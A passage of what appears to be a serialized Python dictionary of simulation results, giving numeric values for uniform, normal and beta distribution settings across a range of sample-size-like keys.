0.11784520617150873, 'beta1': 0.045160080333170705, 'beta2': 0.09071832655647427, 'beta4': 0.03657944795279622}, 400: {'uni': 0.054244251799578425, 'nor': 0.120664612299139, 'beta1': 0.05055449392108258, 'beta2': 0.09478104392591502, 'beta4': 0.041067052741879134}, 300: {'uni': 0.06146708324946404, 'nor': 0.12458558674066761, 'beta1': 0.05823153766200054, 'beta2': 0.10042052998914, 'beta4': 0.04754493134712555}, 200: {'uni': 0.07360874613430221, 'nor': 0.1329409951894065, 'beta1': 0.0712112137494094, 'beta2': 0.11080986220563926, 'beta4': 0.05867823822711815}, 150: {'uni': 0.08397023944800297, 'nor': 0.1390438256951947, 'beta1': 0.08237631752937374, 'beta2': 0.11918607548226523, 'beta4': 0.06866317554335899}, 100: {'uni': 0.10128809169151631, 'nor': 0.1517267646035071, 'beta1': 0.09972424769262522, 'beta2': 0.1354500191068707, 'beta4': 0.0849190667878878}, 75: {'uni': 0.11597845714700927, 'nor': 0.16309000570623827, 'beta1': 0.11559498237300614, 'beta2': 0.14589154324925346, 'beta4': 0.0999162933165636}, 50: {'uni': 0.14069800262255838, 'nor': 0.1839187462219669, 'beta1': 0.13981209728742372, 'beta2': 0.16778239734387568, 'beta4': 0.12425346462613163}, 30: {'uni': 0.1797446733169624, 'nor': 0.21644972902621398, 'beta1': 0.18059243359809551, 'beta2': 0.20202152261026132, 'beta4': 0.1636678723512469}, 20: {'uni': 0.21937480663500575, 'nor': 0.2497527953300106, 'beta1': 0.21979044357993877, 'beta2': 0.2359411650840486, 'beta4': 0.20332953036428597}, 10: {'uni': 0.30351794338910415, 'nor': 0.329349286588422, 'beta1': 0.3059412686044445, 'beta2': 0.31726353751068403, 'beta4': 0.291909252822552}}, 20: {1000: {'uni': 0.04786473758448062, 'nor': 0.13448854973910773, 'beta1': 0.0474900351548871, 'beta2': 0.09274155108383075, 'beta4': 0.025530278131800782}, 750: {'uni': 0.05039616783397134, 'nor': 0.135064704569215, 'beta1': 0.04765005160770225, 'beta2': 0.09674441211509341, 'beta4': 0.029683541983339667}, 500: {'uni': 0.05547762205023854, 'nor': 0.14001720599630382, 'beta1': 0.048106962180010204, 'beta2': 0.09953924927118829, 'beta4': 0.036370817128490524}, 400: {'uni': 0.05974197156622235, 'nor': 0.14172064957995056, 'beta1': 0.050872352437056095, 'beta2': 0.10418161630558852, 'beta4': 0.040764857091411755}, 300: {'uni': 0.06524051543131026, 'nor': 0.14595220600119096, 'beta1': 0.05848865491478826, 'beta2': 0.10998005813512912, 'beta4': 0.04701701027264421}, 200: {'uni': 0.0770744511637107, 'nor': 0.1547803767946513, 'beta1': 0.07133133392276658, 'beta2': 0.12003921068285384, 'beta4': 0.05833256338473064}, 150: {'uni': 0.08698214434451997, 'nor': 0.15954648186161546, 'beta1': 0.08183176545570486, 'beta2': 0.12777944293922183, 'beta4': 0.0675035999630012}, 100: {'uni': 0.10375409883656361, 'nor': 0.17061333037285303, 'beta1': 0.10022434196661106, 'beta2': 0.14179923508732106, 'beta4': 0.08374673612833905}, 75: {'uni': 0.11797678653950688, 'nor': 0.18236373219061275, 'beta1': 0.11557026107752538, 'beta2': 0.15377848750968914, 'beta4': 0.09757004251626233}, 50: {'uni': 0.14172731535262179, 'nor': 0.20038698791993043, 'beta1': 0.14046926902337709, 'beta2': 0.1743686159633676, 'beta4': 0.12110025961019322}, 30: {'uni': 0.18039349397749566, 'nor': 0.23067978968795344, 'beta1': 0.18045976448956377, 'beta2': 0.2072893207928338, 'beta4': 0.1592884038412401}, 20: {'uni': 0.21805931381049123, 'nor': 0.2651676956522234, 'beta1': 0.2177278691596758, 'beta2': 0.24147576401840687, 'beta4': 0.19939491723223757}, 10: {'uni': 0.30440975524739855, 'nor': 0.3384425023063676, 'beta1': 0.30324741022916285, 'beta2': 0.3185465132986438, 'beta4': 0.28767747944269173}}, 10: {1000: {'uni': 0.07946518628481158, 'nor': 0.19045003908328084, 'beta1': 0.08877611003813457, 'beta2': 0.1215657503670089, 'beta4': 0.025503535463525406}, 750: {'uni': 0.08130748653818165, 'nor': 0.19076450111902787, 'beta1': 0.0888890045454918, 'beta2': 0.1243044166371681, 'beta4': 0.02964909526636217}, 500: {'uni': 0.0836110010994472, 'nor': 0.19475368394850967, 'beta1': 0.08883318435651434, 'beta2': 0.12587466253680676, 'beta4': 0.03601840756954122}, 400: {'uni': 0.08549487851383872, 'nor': 0.19779586035735008, 'beta1': 0.08896831846511888, 'beta2': 0.12932758634367436, 'beta4': 0.040363816396343344}, 300: {'uni': 0.08877082904027409, 'nor': 0.20230056685424241, 'beta1': 0.0892045849308271, 'beta2': 0.1336762783031652, 'beta4': 0.046694189532298924}, 200: {'uni': 0.09521605691554982, 'nor': 0.20745003836138798, 'beta1': 0.09002076182309414, 'beta2': 0.14011661109027673, 'beta4': 0.057187663505482156}, 150: {'uni': 0.10136020236794296, 'nor': 0.21186943326805385, 'beta1': 0.09104611326846368, 'beta2': 0.1473809348866521, 'beta4': 0.06636195162267067}, 100: {'uni': 0.11533493817169593, 'nor': 0.22268646748177195, 'beta1': 0.10124550813275801, 'beta2': 0.1601077268001888, 'beta4': 0.08126272311296007}, 75: {'uni': 0.1269965695852332, 'nor': 0.23055614273483438, 'beta1': 0.11618044158873528, 'beta2': 0.16938005363200836, 'beta4': 0.09468104187919912}, 50: {'uni': 0.14865284782727461, 'nor': 0.24696834892452627, 'beta1': 0.1404127307767683, 'beta2': 0.18957960935246276, 'beta4': 0.1167721820183078}, 30: {'uni': 0.184923823116925, 'nor': 0.27382056048837045, 'beta1': 0.17891559108637778, 'beta2': 0.22039797844074127, 'beta4': 0.15358516539031264}, 20: {'uni': 0.22119035292803724, 'nor': 0.304517491178646, 'beta1': 0.21765673628337645, 'beta2': 0.2524910203909854, 'beta4': 0.19029690570897123}, 10: {'uni': 0.3023407524707935, 'nor': 0.3728834325973778, 'beta1': 0.3009333240399166, 'beta2': 0.3231264581550173, 'beta4': 0.2754491139259927}}}, 0.3: {1000: {1000: {'uni': 0.030570556366491086, 'nor': 0.036289126652867154, 'beta1': 0.030583281607816093, 'beta2': 0.04730099054512937, 'beta4': 0.027928049313802772}, 750: {'uni': 0.03530316336772765, 'nor': 0.039975128387633396, 'beta1': 0.03548791254752648, 'beta2': 0.04903397020548944, 'beta4': 0.03276890983776548}, 500: {'uni': 0.04335100802104869, 'nor': 0.047243089590878945, 'beta1': 0.04320767542248788, 'beta2': 0.05406062302488723, 'beta4': 0.04082881841396535}, 400: {'uni': 0.048281092293393224, 'nor': 0.05205613503513076, 'beta1': 0.04839219227783753, 'beta2': 0.05736812647420142, 'beta4': 0.04577289803172907}, 300: {'uni': 0.05576437362285486, 'nor': 0.058754859846003094, 'beta1': 0.05561895544923556, 'beta2': 0.06376771212789967, 'beta4': 0.0536396672811823}, 200: {'uni': 0.06807572111096638, 'nor': 0.07039249496628318, 'beta1': 0.06817615907229235, 'beta2': 0.07430836655124429, 'beta4': 0.066284048834367}, 150: {'uni': 0.07830726923539255, 'nor': 0.08091810478755601, 'beta1': 0.07807558772859324, 'beta2': 0.08365151347909958, 'beta4': 0.07647958259852394}, 100: {'uni': 0.09565657848301334, 'nor': 0.0981123740412867, 'beta1': 0.09587885037300997, 'beta2': 0.10003610046247435, 'beta4': 0.09378950313692502}, 75: {'uni': 0.10998073605007008, 'nor': 0.11214689636427033, 'beta1': 0.11019075143205581, 'beta2': 0.11354410085085964, 'beta4': 0.10847644171113585}, 50: {'uni': 0.13428431589627038, 'nor': 0.1352778263583828, 'beta1': 0.1339667315839076, 'beta2': 0.1367603615159646, 'beta4': 0.13324126975406497}, 30: {'uni': 0.17274539443709994, 'nor': 0.17277197187209536, 'beta1': 0.17259686934288682, 'beta2': 0.17455077451940057, 'beta4': 0.17209316662270396}, 20: {'uni': 0.20849017587916696, 'nor': 0.21018909590633755, 'beta1': 0.20978229440378748, 'beta2': 0.210556894106393, 'beta4': 0.20983525727222768}, 10: {'uni': 0.2922169330616662, 'nor': 0.29235515396060796, 'beta1': 0.2914316509769965, 'beta2': 0.29365520324231675, 'beta4': 0.2918719921765267}}, 750: {1000: {'uni': 0.03059448158059208, 'nor': 0.037494550974039864, 'beta1': 0.03057665642636398, 'beta2': 0.04757089622996813, 'beta4': 0.027541558054662435}, 750: {'uni': 0.03510618818786626, 'nor': 0.04119138451985416, 'beta1': 0.03541571187769252, 'beta2': 0.04928902750824704, 'beta4': 0.03230008384262106}, 500: {'uni': 0.0431773659571921, 'nor': 0.048603218782619584, 'beta1': 0.043287997446947, 'beta2': 0.0546730633316056, 'beta4': 0.04048647809949074}, 400: {'uni': 0.04824116558225555, 'nor': 0.05321843834621287, 'beta1': 0.048199305013701704, 'beta2': 0.05800775236698885, 'beta4': 0.04530463746309643}, 300: {'uni': 0.05540518670798833, 'nor': 0.05982198884996326, 'beta1': 0.05567771562072299, 'beta2': 0.06397030785670665, 'beta4': 0.053117582056761314}, 200: {'uni': 0.06772031378900262, 'nor': 0.07116110493731592, 'beta1': 0.06816649733957653, 'beta2': 0.07445014600178901, 'beta4': 0.06569301339546207}, 150: {'uni': 0.07825718715284269, 'nor': 0.08109665950539868, 'beta1': 0.0781046497986293, 'beta2': 0.08456066993421218, 'beta4': 0.0760047555558192}, 100: {'uni': 0.09560224022937375, 'nor': 0.09783638693011121, 'beta1': 0.09584895290202361, 'beta2': 0.10104976356957773, 'beta4': 0.0933672980698591}, 75: {'uni': 0.11025701077751521, 'nor': 0.11241322058286463, 'beta1': 0.11027559531133363, 'beta2': 0.1146920311954221, 'beta4': 0.10829053112713038}, 50: {'uni': 0.1348035578662452, 'nor': 0.13548682039682758, 'beta1': 0.13551492026149686, 'beta2': 0.13742355171140241, 'beta4': 0.13319685684134053}, 30: {'uni': 0.17183186657209226, 'nor': 0.17337212860618245, 'beta1': 0.17194526495477658, 'beta2': 0.17514496328394213, 'beta4': 0.17170411964854926}, 20: {'uni': 0.20996377678372924, 'nor': 0.21037655192180804, 'beta1': 0.2091953390508008, 'beta2': 0.21268253320487945, 'beta4': 0.20887454279336315}, 10: {'uni': 0.2925813013469445, 'nor': 0.2934970209180323, 'beta1': 0.2903843227554898, 'beta2': 0.292154024055348, 'beta4': 0.29025052699691306}}, 500: {1000: {'uni': 0.030652753404500244, 'nor': 0.04025690717821617, 'beta1': 0.030458725319031765, 'beta2': 0.049452523707565255, 'beta4': 0.026981460357740128}, 750: {'uni': 0.035255881858022864, 'nor': 0.04408262087996018, 'beta1': 0.03533505950722848, 'beta2': 0.05114773735578226, 'beta4': 0.031654754917049166}, 500: {'uni': 0.04332946212438382, 'nor': 0.050711888523930104, 'beta1': 0.043188647812777536, 'beta2': 0.056694190819294554, 'beta4': 0.03937922946595157}, 400: {'uni': 0.048011092268698596, 'nor': 0.055004776506215936, 'beta1': 0.04817813554171174, 'beta2': 0.06059305610807844, 'beta4': 0.04451593078130045}, 300: {'uni': 0.05595247678173959, 'nor': 0.06136644245697265, 'beta1': 0.05542281776135362, 'beta2': 0.06619403671726683, 'beta4': 0.05220515153028432}, 200: {'uni': 0.06793933725045043, 'nor': 0.072898052813477, 'beta1': 0.067644332252282, 'beta2': 0.07738699602692958, 'beta4': 0.06489369991242622}, 150: {'uni': 0.07828090175002178, 'nor': 0.08301359537151642, 'beta1': 0.07815202804646415, 'beta2': 0.08680541880550621, 'beta4': 0.07563081329347063}, 100: {'uni': 0.09519553412075393, 'nor': 0.09944204457595673, 'beta1': 0.09607238042455157, 'beta2': 0.10213640052628101, 'beta4': 0.09308677814519356}, 75: {'uni': 0.10987316808535197, 'nor': 0.11376703529598509, 'beta1': 0.11023390350368756, 'beta2': 0.11604916566241219, 'beta4': 0.10758493316270056}, 50: {'uni': 0.13478443657887695, 'nor': 0.13740298760950306, 'beta1': 0.13406829393670033, 'beta2': 0.13903979048229387, 'beta4': 0.13262398989576224}, 30: {'uni': 0.17197956239052636, 'nor': 0.17432046908514903, 'beta1': 0.17182749783377138, 'beta2': 0.1754950827809304, 'beta4': 0.17133978839693642}, 20: {'uni': 0.2092323475175519, 'nor': 0.2121086324057767, 'beta1': 0.20789680345483424, 'beta2': 0.21277241600873145, 'beta4': 0.20863390282366368}, 10: {'uni': 0.2917818325981677, 'nor': 0.29390261172986865, 'beta1': 0.29469106553609536, 'beta2': 0.2925795869784428, 'beta4': 0.29103683472752606}}, 400: {1000: {'uni': 0.030479441749132086, 'nor': 0.04242546169128053, 'beta1': 0.030684562640612367, 'beta2': 0.04928918568341689, 'beta4': 0.026564469238728072}, 750: {'uni': 0.035330745692963184, 'nor': 0.045726585835036526, 'beta1': 0.035249379001672465, 'beta2': 0.051449055827561985, 'beta4': 0.031085761627238417}, 500: {'uni': 0.04298425565078945, 'nor': 0.05219112197292464, 'beta1': 0.04291699141997607, 'beta2': 0.05671446941827829, 'beta4': 0.03879788587172339}, 400: {'uni': 0.04841156712913064, 'nor': 0.0567067838815154, 'beta1': 0.04826292059676973, 'beta2': 0.06080155637236173, 'beta4': 0.04387502981511732}, 300: {'uni': 0.05551848242038693, 'nor': 0.06314336913027119, 'beta1': 0.055995408019056725, 'beta2': 0.06670707901265915, 'beta4': 0.05161729197545491}, 200: {'uni': 0.06753280207209278, 'nor': 0.07418549342747993, 'beta1': 0.06780632083464455, 'beta2': 0.07849742855872144, 'beta4': 0.06417277685422138}, 150: {'uni': 0.07892131000767688, 'nor': 0.08428480798230137, 'beta1': 0.07802952658645362, 'beta2': 0.08721266316087362, 'beta4': 0.07509578556966912}, 100: {'uni': 0.09561040817701183, 'nor': 0.10046283966596203, 'beta1': 0.09553795639618262, 'beta2': 0.10295978967769193, 'beta4': 0.09309270468588221}, 75: {'uni': 0.10996879959002176, 'nor': 0.11403749710690919, 'beta1': 0.10970089630785607, 'beta2': 0.11687400266180792, 'beta4': 0.10767273652342291}, 50: {'uni': 0.1341573935423448, 'nor': 0.13750721156433715, 'beta1': 0.13357309262133255, 'beta2': 0.139422581194317, 'beta4': 0.13196955935935817}, 30: {'uni': 0.1719839698851492, 'nor': 0.17517615589326285, 'beta1': 0.171936226302963, 'beta2': 0.1757297703717665, 'beta4': 0.17054913647066844}, 20: {'uni': 0.20962568415417043, 'nor': 0.21093017482022178, 'beta1': 0.2109531327417335, 'beta2': 0.2124421410702677, 'beta4': 0.20866942953199907}, 10: {'uni': 0.2915846887153032, 'nor': 0.29318333013550635, 'beta1': 0.29230277183835673, 'beta2': 0.2935460494777875, 'beta4': 0.28943585016669493}}, 300: {1000: {'uni': 0.03073870905118381, 'nor': 0.0453721867186922, 'beta1': 0.030539757310093174, 'beta2': 0.051014128266916536, 'beta4': 0.02630816348221443}, 750: {'uni': 0.03527707956428239, 'nor': 0.04863496689192515, 'beta1': 0.03535272337640838, 'beta2': 0.05309247098188674, 'beta4': 0.030847740239343002}, 500: {'uni': 0.043103093119915115, 'nor': 0.05537548898945838, 'beta1': 0.043192985581247845, 'beta2': 0.05832301347306265, 'beta4': 0.03827598384084602}, 400: {'uni': 0.048262357386229554, 'nor': 0.05896990305419164, 'beta1': 0.048041282307002886, 'beta2': 0.06273926833030019, 'beta4': 0.04347619692280544}, 300: {'uni': 0.05560700720185019, 'nor': 0.06551918373036114, 'beta1': 0.05595087210581695, 'beta2': 0.07079250726314845, 'beta4': 0.050855969461618744}, 200: {'uni': 0.06812841845448789, 'nor': 0.07631719062877812, 'beta1': 0.06791089524731492, 'beta2': 0.08017905748846188, 'beta4': 0.0633369247159101}, 150: {'uni': 0.07810976084211943, 'nor': 0.08571298221651569, 'beta1': 0.07824014285292191, 'beta2': 0.08865175294154615, 'beta4': 0.07411587643546858}, 100: {'uni': 0.09592845950854673, 'nor': 0.10235667303102258, 'beta1': 0.09560853089329824, 'beta2': 0.10410221530439875, 'beta4': 0.09145854216968004}, 75: {'uni': 0.11015610349253213, 'nor': 0.1161051824359548, 'beta1': 0.10967509979155243, 'beta2': 0.11812739483956008, 'beta4': 0.10661075747218696}, 50: {'uni': 0.13390288180005772, 'nor': 0.13883954661488274, 'beta1': 0.13467234949737394, 'beta2': 0.14042225887719018, 'beta4': 0.13136625179037467}, 30: {'uni': 0.1724189791803339, 'nor': 0.17610514891945817, 'beta1': 0.1721264669585005, 'beta2': 0.17732195199566786, 'beta4': 0.16928963468833258}, 20: {'uni': 0.20941682201461762, 'nor': 0.21215745594224503, 'beta1': 0.209618043392665, 'beta2': 0.21371395755354405, 'beta4': 0.20720457780049284}, 10: {'uni': 0.29136573039108826, 'nor': 0.2953533906937393, 'beta1': 0.2915141637355504, 'beta2': 0.2947095663135966, 'beta4': 0.289661443618565}}, 200: {1000: {'uni': 0.03064984686392691, 'nor': 0.05043451860288389, 'beta1': 0.03064869204617815, 'beta2': 0.05363856162776437, 'beta4': 0.025837623182089042}, 750: {'uni': 0.035114470743031645, 'nor': 0.053636498003354405, 'beta1': 0.03554354970773452, 'beta2': 0.05641494858720919, 'beta4': 0.030228871955573333}, 500: {'uni': 0.04344683479356848, 'nor': 0.05942737801622866, 'beta1': 0.043048920849664496, 'beta2': 0.06112458005245336, 'beta4': 0.037499090398733725}, 400: {'uni': 0.04819713799051478, 'nor': 0.06309225457944956, 'beta1': 0.04838699880676922, 'beta2': 0.06781833446638641, 'beta4': 0.0425087448681592}, 300: {'uni': 0.05572898393078207, 'nor': 0.06952530258059553, 'beta1': 0.05570841382179792, 'beta2': 0.07285768572268875, 'beta4': 0.049575966762646265}, 200: {'uni': 0.06807383659418853, 'nor': 0.0801618017819507, 'beta1': 0.06801333859302938, 'beta2': 0.08234805993218725, 'beta4': 0.062140022551191165}, 150: {'uni': 0.07824711164133136, 'nor': 0.08923127184269253, 'beta1': 0.07883741776826814, 'beta2': 0.09251067651440004, 'beta4': 0.07291587380406012}, 100: {'uni': 0.09560431314077711, 'nor': 0.10450815715126349, 'beta1': 0.09567404787638834, 'beta2': 0.10773887846339109, 'beta4': 0.0902075650584725}, 75: {'uni': 0.10977650182622334, 'nor': 0.11816618106678134, 'beta1': 0.1102669991197075, 'beta2': 0.12049187221799695, 'beta4': 0.1048324984984148}, 50: {'uni': 0.1343039124732452, 'nor': 0.14086250431567415, 'beta1': 0.13455177937493012, 'beta2': 0.14203349915576058, 'beta4': 0.1302572093652935}, 30: {'uni': 0.1724479563898607, 'nor': 0.1782054960600049, 'beta1': 0.1720655432067857, 'beta2': 0.1780270710205825, 'beta4': 0.16818233155276918}, 20: {'uni': 0.2093785331688025, 'nor': 0.2140572740180554, 'beta1': 0.21029145111991537, 'beta2': 0.21456930963381293, 'beta4': 0.20682532198274484}, 10: {'uni': 0.29202855251861926, 'nor': 0.2954659784755673, 'beta1': 0.292463352998359, 'beta2': 0.2955290443845223, 'beta4': 0.2887217045817}}, 150: {1000: {'uni': 0.030838216779515926, 'nor': 0.055018265206959294, 'beta1': 0.030517843339180506, 'beta2': 0.05608372418016283, 'beta4': 0.025431929019819777}, 750: {'uni': 0.035362123917898614, 'nor': 0.058457030173542646, 'beta1': 0.03537517904333426, 'beta2': 0.058769180918217145, 'beta4': 0.029837989943044763}, 500: {'uni': 0.043213922318430464, 'nor': 0.06424368163594418, 'beta1': 0.04316681258670646, 'beta2': 0.06710587272080526, 'beta4': 0.03703364619373262}, 400: {'uni': 0.04833376337863218, 'nor': 0.06756792606856232, 'beta1': 0.04799783573268496, 'beta2': 0.07039870056739572, 'beta4': 0.041724718744219014}, 300: {'uni': 0.05586146681024584, 'nor': 0.07329310314756038, 'beta1': 0.05529638444154705, 'beta2': 0.07558336097154274, 'beta4': 0.04886164431709525}, 200: {'uni': 0.06794570035955794, 'nor': 0.08378073139649633, 'beta1': 0.06823928564341947, 'beta2': 0.0860472972006906, 'beta4': 0.06117936529617951}, 150: {'uni': 0.07839758781878625, 'nor': 0.09231986974590034, 'beta1': 0.07844421422032721, 'beta2': 0.09371209848751239, 'beta4': 0.07131228351352475}, 100: {'uni': 0.09586975657519081, 'nor': 0.10714675207140412, 'beta1': 0.09559347574817811, 'beta2': 0.11002902848994539, 'beta4': 0.08959146899533599}, 75: {'uni': 0.11010826171433234, 'nor': 0.12126074477384846, 'beta1': 0.10990930848644964, 'beta2': 0.12178803610217631, 'beta4': 0.10380949345486348}, 50: {'uni': 0.1343214298555367, 'nor': 0.14247203802994213, 'beta1': 0.13385227759189416, 'beta2': 0.14299792348234408, 'beta4': 0.12836902924407073}, 30: {'uni': 0.1725778251785654, 'nor': 0.17826765858321283, 'beta1': 0.17232850345099437, 'beta2': 0.17902665877961377, 'beta4': 0.16804486300951366}, 20: {'uni': 0.20923828034878794, 'nor': 0.21505427759471324, 'beta1': 0.20947316437016195, 'beta2': 0.21556344537944894, 'beta4': 0.205296822907456}, 10: {'uni': 0.2912969465283485, 'nor': 0.29786616175121944, 'beta1': 0.2921180556905318, 'beta2': 0.2942536240063773, 'beta4': 0.28867921289925763}}, 100: {1000: {'uni': 0.031072383442646623, 'nor': 0.06286992752019249, 'beta1': 0.030625891912101244, 'beta2': 0.05879416691552142, 'beta4': 0.025203295860677627}, 750: {'uni': 0.03580272688057862, 'nor': 0.06614015652523586, 'beta1': 0.035330967643673494, 'beta2': 0.06164117508809697, 'beta4': 0.029546455172328512}, 500: {'uni': 0.04347491725851127, 'nor': 0.07103887819755894, 'beta1': 0.04288278858954275, 'beta2': 0.06950563628146106, 'beta4': 0.036250627429170346}, 400: {'uni': 0.04841725320908952, 'nor': 0.07515276106744045, 'beta1': 0.048207874825495156, 'beta2': 0.07281441955053547, 'beta4': 0.04106938703316515}, 300: {'uni': 0.05581361792803008, 'nor': 0.0804344767904921, 'beta1': 0.05549497359097222, 'beta2': 0.07860014494562395, 'beta4': 0.04816835176472789}, 200: {'uni': 0.0680104028224871, 'nor': 0.0899287719835754, 'beta1': 0.06768158716081898, 'beta2': 0.08861735552692984, 'beta4': 0.059838070085047684}, 150: {'uni': 0.07830299427203302, 'nor': 0.09823952555336729, 'beta1': 0.0781938574456082, 'beta2': 0.09864482170689659, 'beta4': 0.07000041446264826}, 100: {'uni': 0.09572762933073209, 'nor': 0.11370380350455811, 'beta1': 0.09588982413073177, 'beta2': 0.11254326539068987, 'beta4': 0.0872727084042092}, 75: {'uni': 0.10972174136249069, 'nor': 0.1261032950814237, 'beta1': 0.10998724073974103, 'beta2': 0.1250175630115139, 'beta4': 0.10149116692916582}, 50: {'uni': 0.1346226891470239, 'nor': 0.1474470477708189, 'beta1': 0.13398284073629363, 'beta2': 0.14605045540182798, 'beta4': 0.12656776186643182}, 30: {'uni': 0.171289729627625, 'nor': 0.18300803860826304, 'beta1': 0.17197133058640537, 'beta2': 0.18045847672308146, 'beta4': 0.16615899142928847}, 20: {'uni': 0.20948265436898134, 'nor': 0.21820996754149108, 'beta1': 0.2083154616981402, 'beta2': 0.21682018217589444, 'beta4': 0.20368889712319002}, 10: {'uni': 0.29332092603556315, 'nor': 0.29884771959554113, 'beta1': 0.2928639451085291, 'beta2': 0.29596957653109623, 'beta4': 0.287993475210005}}, 75: {1000: {'uni': 0.03154718546267052, 'nor': 0.07044763487600164, 'beta1': 0.030523906995489347, 'beta2': 0.06095775037531781, 'beta4': 0.025178612703061598}, 750: {'uni': 0.03587641128641306, 'nor': 0.07299193497447859, 'beta1': 0.035281289240443936, 'beta2': 0.06385369106198494, 'beta4': 0.029127736955950057}, 500: {'uni': 0.04391766277410497, 'nor': 0.07813329575242478, 'beta1': 0.04340596642353545, 'beta2': 0.07179729219122671, 'beta4': 0.036086430090033816}, 400: {'uni': 0.048844097708170386, 'nor': 0.08183669421171236, 'beta1': 0.04807797399750002, 'beta2': 0.07521514498858767, 'beta4': 0.04049563308356163}, 300: {'uni': 0.0559940480059955, 'nor': 0.08609350845523445, 'beta1': 0.055831745197134575, 'beta2': 0.0826010220686782, 'beta4': 0.04713573528154402}, 200: {'uni': 0.0683453076733273, 'nor': 0.09540815213423537, 'beta1': 0.06790338184860889, 'beta2': 0.09158709481883592, 'beta4': 0.059111816398762285}, 150: {'uni': 0.07844185085801125, 'nor': 0.10391542371009366, 'beta1': 0.07831073142916842, 'beta2': 0.10032168899848526, 'beta4': 0.06888011570999455}, 100: {'uni': 0.09594855642525024, 'nor': 0.11746142695193407, 'beta1': 0.09516113565651263, 'beta2': 0.11488209132926885, 'beta4': 0.08612950477373915}, 75: {'uni': 0.10978056964178606, 'nor': 0.13039658706335377, 'beta1': 0.11037351197141043, 'beta2': 0.12760478930659974, 'beta4': 0.10050946376158554}, 50: {'uni': 0.1342077394648763, 'nor': 0.15134188483531175, 'beta1': 0.13361807973321893, 'beta2': 0.14895024123184664, 'beta4': 0.1248108548205345}, 30: {'uni': 0.17154364522069487, 'nor': 0.18473249458088753, 'beta1': 0.17248033985600267, 'beta2': 0.18331185817811452, 'beta4': 0.16423432417184547}, 20: {'uni': 0.20782941225027318, 'nor': 0.22146906910281994, 'beta1': 0.209751594461421, 'beta2': 0.2173162603888529, 'beta4': 0.20159255474557342}, 10: {'uni': 0.291334076187922, 'nor': 0.2992867706784435, 'beta1': 0.29261596744170054, 'beta2': 0.2960163189286691, 'beta4': 0.28524371036426077}}, 50: {1000: {'uni': 0.0329993154562257, 'nor': 0.08207318747113157, 'beta1': 0.030671468325690204, 'beta2': 0.06648424648000095, 'beta4': 0.02488381017609015}, 750: {'uni': 0.03738443452448176, 'nor': 0.08572544936677795, 'beta1': 0.035303282232089284, 'beta2': 0.07002036286325686, 'beta4': 0.028894147053289826}, 500: {'uni': 0.044737763029671695, 'nor': 0.08966708732648676, 'beta1': 0.04340465898409554, 'beta2': 0.07682945882872405, 'beta4': 0.03548424878981277}, 400: {'uni': 0.04937088906781539, 'nor': 0.09281018247408995, 'beta1': 0.04840075745360373, 'beta2': 0.07992875043033376, 'beta4': 0.03972236374485255}, 300: {'uni': 0.056674883766536566, 'nor': 0.09773596053700151, 'beta1': 0.05549753161205717, 'beta2': 0.08714041454214849, 'beta4': 0.04659758746289444}, 200: {'uni': 0.06860153239416655, 'nor': 0.10630954521453767, 'beta1': 0.06793537494136576, 'beta2': 0.09641941459565317, 'beta4': 0.05784887912329589}, 150: {'uni': 0.0787453526380626, 'nor': 0.11324399916126676, 'beta1': 0.07869495808729748, 'beta2': 0.10493442734242159, 'beta4': 0.06755025538156267}, 100: {'uni': 0.09522502884464878, 'nor': 0.12666649348936998, 'beta1': 0.0955330448453976, 'beta2': 0.11990014749723277, 'beta4': 0.08427352133834594}, 75: {'uni': 0.1100197062263768, 'nor': 0.13833028774850076, 'beta1': 0.10986631872332808, 'beta2': 0.13176370778245594, 'beta4': 0.09870160730848387}, 50: {'uni': 0.13421155841951937, 'nor': 0.15941967086434394, 'beta1': 0.1339691684883051, 'beta2': 0.15279416514019803, 'beta4': 0.12213609394490166}, 30: {'uni': 0.1721102987741357, 'nor': 0.19290136415164644, 'beta1': 0.1729701132110737, 'beta2': 0.18618368178105146, 'beta4': 0.16098989092313043}, 20: {'uni': 0.20807791188346714, 'nor': 0.2270631379617466, 'beta1': 0.20884121198766303, 'beta2': 0.22035377475051882, 'beta4': 0.1999515315854391}, 10: {'uni': 0.28942960019437525, 'nor': 0.30528957184252636, 'beta1': 0.29033509284968895, 'beta2': 0.3002914665011813, 'beta4': 0.2840920174861028}}, 30: {1000: {'uni': 0.03740912638303681, 'nor': 0.1036739698595659, 'beta1': 0.03212037925335687, 'beta2': 0.07451381449879518, 'beta4': 0.024765179813423077}, 750: {'uni': 0.04113538401988681, 'nor': 0.10564716613623504, 'beta1': 0.03524754243631689, 'beta2': 0.07840817147245094, 'beta4': 0.028582301342003846}, 500: {'uni': 0.04768205798272118, 'nor': 0.10893592471801378, 'beta1': 0.043098984557192854, 'beta2': 0.08429395075959556, 'beta4': 0.035281334521673924}, 400: {'uni': 0.052145846598435464, 'nor': 0.11218348141224654, 'beta1': 0.048316311309606494, 'beta2': 0.08737730595826376, 'beta4': 0.03951837119677115}, 300: {'uni': 0.058719416850484873, 'nor': 0.11635156663185392, 'beta1': 0.05539882042196062, 'beta2': 0.09410523757141842, 'beta4': 0.04574881189356261}, 200: {'uni': 0.07049814833509804, 'nor': 0.12466200180191964, 'beta1': 0.06800412320163807, 'beta2': 0.10367008819351042, 'beta4': 0.05653287408590357}, 150: {'uni': 0.07998404492207556, 'nor': 0.13156596855270042, 'beta1': 0.07831590231210439, 'beta2': 0.11171068575197618, 'beta4': 0.0660458608943065}, 100: {'uni': 0.09736733051622676, 'nor': 0.14383411909324195, 'beta1': 0.09527581350107495, 'beta2': 0.1266963468351454, 'beta4': 0.08165556587689915}, 75: {'uni': 0.11099146175383867, 'nor': 0.15454031497016313, 'beta1': 0.11017526259797866, 'beta2': 0.13795208288587246, 'beta4': 0.09575531965915296}, 50: {'uni': 0.13538536757080866, 'nor': 0.17221057810453794, 'beta1': 0.1338257169878449, 'beta2': 0.15804741489707852, 'beta4': 0.11922046414258292}, 30: {'uni': 0.1712608697310144, 'nor': 0.205400562436021, 'beta1': 0.17222575085713476, 'beta2': 0.19119060032529278, 'beta4': 0.1565519610771569}, 20: {'uni': 0.2068845576782115, 'nor': 0.23594894671277633, 'beta1': 0.20857821881607397, 'beta2': 0.2242706036141524, 'beta4': 0.1940900991677027}, 10: {'uni': 0.29081139802402245, 'nor': 0.31265691993665123, 'beta1': 0.29235607151474635, 'beta2': 0.3015701463278587, 'beta4': 0.2789156239002969}}, 20: {1000: {'uni': 0.04642868998031713, 'nor': 0.12332330472504827, 'beta1': 0.04718089852596563, 'beta2': 0.08438078560427192, 'beta4': 0.02457559775898424}, 750: {'uni': 0.04842165313054653, 'nor': 0.12556727406528229, 'beta1': 0.04738271045571918, 'beta2': 0.08834690715792337, 'beta4': 0.028340709811087494}, 500: {'uni': 0.053533279505937725, 'nor': 0.12887684121155335, 'beta1': 